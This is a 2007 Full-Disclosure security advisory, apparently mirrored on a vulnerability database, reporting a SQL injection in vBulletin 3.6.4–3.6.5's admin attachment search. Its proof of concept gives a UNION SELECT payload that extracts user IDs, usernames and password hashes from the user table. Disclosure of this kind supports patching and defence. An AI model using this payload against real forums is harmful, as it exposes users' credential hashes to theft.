Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16346
HistoryMar 14, 2007 - 12:00 a.m.

[Full-disclosure] vbulletin admincp sql injection

2007-03-1400:00:00
vulners.com
23

/****************************************/

CREDIT:
discovered by meto5757 and disfigure

PRODUCT:
vBulletin
http://www.vbulletin.com/

VULNERABILITY:
SQL Injection

NOTES:

  • not a serious vulnerability, can only be used by administrator of site
  • SQL injection can be used to obtain password hash
  • tested on 3.6.4 and 3.6.5

POC:

  1. Log in to admin panel
  2. Go to Attachments->Search
  3. Place the following string in the Attached Before field:

') union select 1,1,1,1,1,userid,password,1,username from user – 9

greets: w4ck1ng.com

/****************************************/


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/